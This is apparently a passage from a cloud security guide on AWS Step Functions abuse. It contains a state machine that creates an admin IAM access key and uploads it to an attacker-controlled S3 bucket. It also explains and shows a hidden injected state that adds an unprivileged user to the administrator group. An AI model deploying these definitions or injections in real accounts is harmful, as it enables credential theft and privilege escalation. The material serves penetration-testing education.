{"Comment":"Malicious state machine to create IAM access key and upload to S3","StartAt":"CreateAccessKey","States": {"CreateAccessKey": {"Type":"Task","Resource":"arn:aws:states:::aws-sdk:iam:createAccessKey","Parameters": {"UserName":"admin"},"ResultPath":"$.AccessKeyResult","Next":"PrepareS3PutObject"},"PrepareS3PutObject": {"Type":"Pass","Parameters": {"Body.$":"$.AccessKeyResult.AccessKey","Bucket":"attacker-controlled-S3-bucket","Key":"AccessKey.json"},"ResultPath":"$.S3PutObjectParams","Next":"PutObject"},"PutObject": {"Type":"Task","Resource":"arn:aws:states:::aws-sdk:s3:putObject","Parameters": {"Body.$":"$.S3PutObjectParams.Body","Bucket.$":"$.S3PutObjectParams.Bucket","Key.$":"$.S3PutObjectParams.Key"},"End":true}}}
The following example shows how to update a legitimate state machine that only invokes a HelloWorld Lambda function, adding one extra state that puts the user unprivilegedUser into the administrator IAM group. When a legitimate user later starts an execution of the updated state machine, the new hidden state runs with the state machine's role and the privilege escalation succeeds.
If the role already attached to the state machine is not permissive enough for the injected state (here it needs iam:AddUserToGroup), the attacker also needs iam:PassRole in order to swap in a more permissive role when updating the state machine, for example one with the arn:aws:iam::aws:policy/AdministratorAccess managed policy attached.
{"Comment":"Hello world from Lambda state machine","StartAt":"Start PassState","States": {"Start PassState": {"Type":"Pass","Next":"LambdaInvoke"},"LambdaInvoke": {"Type":"Task","Resource":"arn:aws:states:::lambda:invoke","Parameters": {"FunctionName":"arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"},"Next":"End PassState"},"End PassState": {"Type":"Pass","End":true}}}
{"Comment":"Hello world from Lambda state machine","StartAt":"Start PassState","States": {"Start PassState": {"Type":"Pass","Next":"LambdaInvoke"},"LambdaInvoke": {"Type":"Task","Resource":"arn:aws:states:::lambda:invoke","Parameters": {"FunctionName":"arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"},"Next":"AddUserToGroup"},"AddUserToGroup": {"Type":"Task","Parameters": {"GroupName":"administrator","UserName":"unprivilegedUser"},"Resource":"arn:aws:states:::aws-sdk:iam:addUserToGroup","Next":"End PassState"},"End PassState": {"Type":"Pass","End":true}}}